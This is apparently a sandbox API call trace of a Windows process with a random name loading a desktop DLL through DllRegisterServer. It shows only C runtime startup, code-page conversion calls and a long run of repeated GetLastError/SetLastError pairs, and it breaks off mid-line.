[0032.459] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllRegisterServer /fn_args=\"1\"" [0032.459] GetEnvironmentStringsW () returned 0x267860* [0032.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3d09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.460] FreeEnvironmentStringsW (penv=0x267860) returned 1 [0032.460] GetStartupInfoA (in: lpStartupInfo=0x22f41c | out: lpStartupInfo=0x22f41c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.460] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.460] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.460] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.460] SetHandleCount (uNumber=0x20) returned 0x20 [0032.460] GetLastError () returned 0x0 [0032.460] SetLastError (dwErrCode=0x0) [0032.460] GetLastError () returned 0x0 [0032.460] SetLastError (dwErrCode=0x0) [0032.460] GetLastError () returned 0x0 [0032.460] SetLastError (dwErrCode=0x0) [0032.460] GetACP () returned 0x4e4 [0032.460] GetLastError () returned 0x0 [0032.460] SetLastError (dwErrCode=0x0) [0032.460] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.460] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f3fc | out: lpCPInfo=0x22f3fc) returned 1 [0032.460] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22eec8 | out: lpCPInfo=0x22eec8) returned 1 [0032.460] GetLastError () returned 0x0 [0032.460] SetLastError (dwErrCode=0x0) [0032.460] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x22ee58 | out: lpCharType=0x22ee58) returned 1 [0032.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x22ec48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.460] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x22eedc | out: lpCharType=0x22eedc) returned 1 [0032.460] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x22ec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.461] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.461] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x22ea08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.461] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x22f1dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04hDô\x14ô\"", lpUsedDefaultChar=0x0) returned 256 [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.461] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f2dc, cbMultiByte=256, lpWideCharStr=0x22ec38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.461] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.461] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x22ea28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.461] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x22f0dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04hDô\x14ô\"", lpUsedDefaultChar=0x0) returned 256 [0032.461] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.461] SetLastError (dwErrCode=0x0) [0032.461] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.462] SetLastError (dwErrCode=0x0) [0032.462] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.463] SetLastError (dwErrCode=0x0) [0032.463] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.464] SetLastError (dwErrCode=0x0) [0032.464] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.465] SetLastError (dwErrCode=0x0) [0032.465] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.466] GetLastError () returned 0x0 [0032.466] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.467] SetLastError (dwErrCode=0x0) [0032.467] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.468] SetLastError (dwErrCode=0x0) [0032.468] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 0x0 [0032.469] SetLastError (dwErrCode=0x0) [0032.469] GetLastError () returned 